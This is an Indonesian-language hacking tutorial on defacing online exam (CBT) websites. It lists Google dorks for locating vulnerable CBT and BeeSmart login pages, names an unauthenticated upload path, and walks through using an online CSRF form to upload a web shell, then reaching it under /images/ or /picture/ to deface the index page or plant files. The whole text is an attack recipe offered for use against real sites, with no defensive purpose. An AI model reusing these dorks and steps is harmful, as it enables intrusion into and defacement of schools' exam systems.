Cara Deface Metode CBT

CARA DEFACE METODE CBT

Assalammualaikum wrb.

kembali lagi sama saya Tn.GR3N0X
Kali Ini Saya Akan Membagikan Tutorial :
"Cara Deface Metode CBT"

Bahan-Bahan :
-Dork
-Koneksi Internet
-mie goreng


Langsung Saja Ke Materi


Dork : inurl:/panel/pages/login.php(Use Your Brain)
-inurl:/login.php inurl:/cbt
-inurl:/login.php intitle:ujian online
-inurl:/login.php intitle:cbt beesmart


Kalo belom dapat,Lu Belum Beruntung :V

–Exploit
/panel/pages/upload-file.php
– CSRF Online(banyak di google)



1. Yang Pertama Dorking dulu dork diatas

.
2. Pilih targetnya,Lalu Tambahkan Exploitnya Dibelakang Pages

Contoh :
http:/www.target.com/login.php

Menjadi :

http:/www.target.com/panel/pages/upload-file.php

Kalo Targetnya "blank putih/warna putih kosong" berarti vuln.

3. Lalu kalo sudah dapat yang vuln, kita masukan link target nya ke CSRF Online,

Untuk POST FILE pilih uploadfile, atau ketik aja 'uploadfile' lalu kalo sudah klik Lock!

4. Lanjut Trus Upload Shell, Klik Aja Choose file Lalu Pilih Shell Kita

Kalo Sudah Klik "upload"

Kalo setelah diupload ada tulisan sukses berarti berhasil shell telah diupload

5. Trus Gimana Cara Ngakses Shellnya?

Untuk Mengakses Shellnya Tambahkan:
/images/namashell.php atau
/picture/namashell.php
dibelakang

Kalo berhasil maka akan muncul tampilan shell kalian.

Wkwkwk Kalau Sudah Kaya Gini
Kau Tau Sendiri
Tebas Index Juga Bisa
Nitip File Juga Bisa


Dork : inurl:/panel/pages/login.php
Exploit : /panel/pages/upload-file.php
Cara akses
Ganti Jadi :
/panel/pages/upload-file.php menjadi /images/NamaShell.php


Sekian Tutor Dari Saya


Wassalammualaikum wrb.